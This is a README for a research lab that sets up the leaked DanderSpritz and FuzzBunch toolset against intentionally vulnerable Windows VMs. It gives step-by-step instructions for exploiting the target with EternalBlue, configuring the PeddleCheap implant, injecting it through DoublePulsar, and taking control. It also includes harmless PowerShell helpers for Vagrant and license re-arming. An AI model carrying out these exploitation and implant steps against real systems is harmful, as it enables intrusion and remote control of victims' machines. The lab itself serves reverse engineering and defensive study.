DanderSpritz Lab

Purpose

The goal of DanderSpritz Lab is to allow researchers and defenders to quickly stand up a fully functional version of DanderSpritz, the Equation Group's post-exploitation toolset, together with a Windows Server 2008 domain and a client as targets. The Windows target has some reverse engineering tools that I found useful while investigating DanderSpritz and its capabilities.

Read a little bit about DanderSpritz lab here: https://medium.com/@francisck/introducing-danderspritz-lab-461912313d7c

A website I've created to document DanderSpritz capabilities and tools: https://danderspritz.com

NOTE: This lab has not been hardened in any way (it is intentionally vulnerable) and runs with default vagrant credentials. Please do not connect or bridge it to any networks you care about.

Requirements


Starting DanderSpritz Lab

DanderSpritz Lab uses Packer, Vagrant, and the vagrant-reload plug-in to install and configure the lab from scratch. Packer downloads the Windows ISOs directly from Microsoft and installs trial versions of the software for use during research.

  1. Clone this repo to your own machine: `git clone git@github.com:francisck/DanderSpritz_lab.git`
  2. Make sure you have the vagrant-reload plug-in installed: `vagrant plugin install vagrant-reload`
  3. In order to download the ISOs and perform the build-out of the Vagrant boxes, run the following command: `packer build danderspritz_lab.json`
  4. Once the Vagrant boxes are built, start the VMs and let them complete some additional configuration: `vagrant up`

Create a FuzzBunch project

  1. Launch the Windows Command Prompt (cmd) and, from `D:\`, run: `python fb.py`
  2. Set a default target address of 192.168.40.3
  3. Set a default callback address of 192.168.40.4
  4. Do not use redirection (at first)
  5. Leave the default log directory
  6. Create a new project (option 0)
  7. Name your new project
  8. Leave the default logs directory

(screenshot: FuzzBunch project)

Exploit the Target Machine

  1. Run the following command to exploit the machine using EternalBlue: `use eternalblue`
  2. Choose all of the default options except the delivery mechanism. Use "FB" (traditional deployment) as the delivery mechanism
  3. Once EternalBlue succeeds, configure DanderSpritz and PeddleCheap

Configure & Launch DanderSpritz

  1. Launch another Windows Command Prompt (cmd) and, from `D:\`, run: `python configure_lp`
  2. Allow Java through the firewall
  3. Select "Browse" next to "Log directory" and choose the name of the FuzzBunch project you created (screenshot: Logs Directory)
  4. Click "go"

PeddleCheap prep (configure the implant)

  1. In the DanderSpritz console, run the following command: `pc_prep`
  2. Select the standard x64-winnt level 3 sharedlib payload (option 5)
  3. Do not select advanced settings
  4. Choose to perform an immediate callback
  5. Use the default PC ID (0)
  6. Select "Yes" to "Do you want to listen?"
  7. Do not change listen ports
  8. Leave the default "callback" address (127.0.0.1)
  9. Do not change the exe name
  10. Use the default key (option 2)
  11. Validate that the PeddleCheap configuration is valid
  12. Do not configure with FC (felonycrowbar)
  13. Copy the location of the configured binary (screenshot: PeddleCheap Binary)

Deliver the implant (peddlecheap) via DoublePulsar backdoor:

  1. In the original FuzzBunch window type: `use doublepulsar`
  2. Choose "yes" when asked if you want to be prompted for variable settings
  3. Select all default variable settings except the target architecture (choose option 1: `1) x64 x64 64-bits`)
  4. Select the "RunDLL" function (option 2: `2) RunDLL Use an APC to inject a DLL into a user mode process.`) (screenshot: DoublePulsar Config)
  5. Leave all other options default and select "Yes" when asked if you want to execute the plugin
  6. You should see "Doublepulsar succeeded"

Connect to PeddleCheap implant with DanderSpritz

  1. In DanderSpritz select "PeddleCheap" at the top of the screen
  2. Select the "default" key from the key dropdown menu
  3. Enter the address of the target machine (192.168.40.3)
  4. Select "Connect to target" (screenshot: PeddleCheap connect)
  5. Select your FuzzBunch project name
  6. Wait for the DanderSpritz survey to complete (it will take quite a while); you'll have to answer a few questions along the way
  7. Profit!

Use for good, not evil!

The purpose of this project is to allow security researchers to build and configure a fully functional DanderSpritz lab easily for reverse engineering and testing.

Day-to-day usage

Once you've run Packer once, you won't need to run it again. The Vagrant boxes will be available for you to rebuild, tear down, and restart your lab.

Below are some useful commands that you may use as you work with the lab:

Basic Vagrant Usage
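As an added example (not code from the DanderSpritz_lab project), the following PowerShell helper parses the output of `vagrant status --machine-readable` so you can see which lab VMs are running before you restart, snapshot or tear them down. The machine names in the constructed sample output (`attacker`, `target`) are hypothetical; the real names are whatever your Vagrantfile defines and `vagrant status` reports.

```powershell
# Added example, not part of the DanderSpritz_lab project.
# Run from the cloned repo directory (where the Vagrantfile lives).

function Get-LabMachineState {
    param(
        # Optional: raw status lines (e.g. a constructed sample) instead of calling vagrant
        [string[]]$StatusLines
    )
    if (-not $StatusLines) {
        # Real call. Each line has the form: timestamp,target,type,data[,data...]
        $StatusLines = & vagrant status --machine-readable
    }
    $states = @{}
    foreach ($line in $StatusLines) {
        $parts = $line -split ','
        # Only "state" records carry the VM state (running, poweroff, not_created, ...)
        if ($parts.Count -ge 4 -and $parts[2] -eq 'state' -and $parts[1] -ne '') {
            $states[$parts[1]] = $parts[3]
        }
    }
    return $states
}

# Constructed sample output; machine names are hypothetical.
$sample = @(
    '1524000000,attacker,metadata,provider,virtualbox',
    '1524000000,attacker,state,running',
    '1524000000,attacker,state-human-short,running',
    '1524000000,target,metadata,provider,virtualbox',
    '1524000000,target,state,poweroff',
    '1524000000,target,state-human-short,poweroff'
)
$states = Get-LabMachineState -StatusLines $sample
$states.GetEnumerator() | ForEach-Object { '{0}: {1}' -f $_.Key, $_.Value }
# attacker: running
# target: poweroff

# Day-to-day actions against the live lab, driven by the parsed state:
# foreach ($m in (Get-LabMachineState).GetEnumerator()) {
#     if ($m.Value -eq 'poweroff') { & vagrant up $m.Key }   # bring stopped VMs back
# }
# & vagrant snapshot save target clean      # snapshot the target before a run
# & vagrant snapshot restore target clean   # roll it back to a clean state afterwards
# & vagrant halt                            # stop everything; "vagrant destroy -f" removes it
```

Snapshotting the target before each exploitation run and restoring it afterwards is the easiest way to keep the lab reproducible without rebuilding the boxes with Packer.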

Re-arm expired Windows hosts

If you run into an issue where the trial license has expired, you can re-arm the hosts up to 3 times (for 90 days of Windows license goodness) by running this command from an administrative command prompt:

`slmgr /rearm`

You'll have to reboot the machine afterwards.
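As an added example (not part of the DanderSpritz_lab project), this PowerShell snippet reads the remaining re-arm count and the remaining grace period from the Windows licensing WMI classes before running the same `slmgr /rearm` command as above, so you don't burn one of the three re-arms while the license is still valid or try to re-arm a host that has none left. It uses `Get-WmiObject` rather than `Get-CimInstance` because the lab hosts (Windows 7 SP1 / Server 2008) ship with PowerShell 2.0; run it from an elevated PowerShell on the VM.

```powershell
# Added example, not part of the DanderSpritz_lab project.
# Run in an elevated PowerShell on the Windows lab host.

function Get-LabLicenseState {
    # SoftwareLicensingService exposes how many Windows re-arms remain on this host.
    $svc = Get-WmiObject -Class SoftwareLicensingService
    # The active Windows license is the SoftwareLicensingProduct row that has a
    # partial product key. GracePeriodRemaining is in minutes; LicenseStatus 1 = licensed.
    $prod = Get-WmiObject -Class SoftwareLicensingProduct |
        Where-Object { $_.PartialProductKey -and $_.Name -like 'Windows*' } |
        Select-Object -First 1
    New-Object PSObject -Property @{
        RemainingRearms = $svc.RemainingWindowsReArmCount
        DaysRemaining   = [math]::Floor($prod.GracePeriodRemaining / 1440)
        LicenseStatus   = $prod.LicenseStatus
    }
}

function Invoke-LabRearmIfNeeded {
    param(
        # Re-arm only when fewer than this many days of grace period remain
        [int]$MinDaysLeft = 3
    )
    $state = Get-LabLicenseState
    $state | Format-List

    if ($state.DaysRemaining -gt $MinDaysLeft) {
        Write-Output "No re-arm needed; $($state.DaysRemaining) day(s) of grace period left."
        return
    }
    if ($state.RemainingRearms -le 0) {
        Write-Output "No re-arms left on this host; rebuild the box with Packer instead."
        return
    }
    # Same command the README gives, invoked explicitly through cscript so it works from PowerShell.
    & cscript.exe //nologo "$env:SystemRoot\System32\slmgr.vbs" /rearm
    # The new grace period only takes effect after a reboot.
    Restart-Computer -Confirm
}

Invoke-LabRearmIfNeeded
```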

Lab Information

Lab Diagram

(diagram: DanderSpritz Lab Diagram)

Additional lab Information

Lab Hosts

Installed Tools on Target (Windows 7 SP1)


Credits/Resources

A sizable percentage of this code was borrowed and adapted from Chris Long's DetectionLab project along with Stefan Scherer's packer-windows and adfs2 GitHub repos. A huge thanks to everyone who has contributed their code to making projects like this easier (or even possible).

Acknowledgements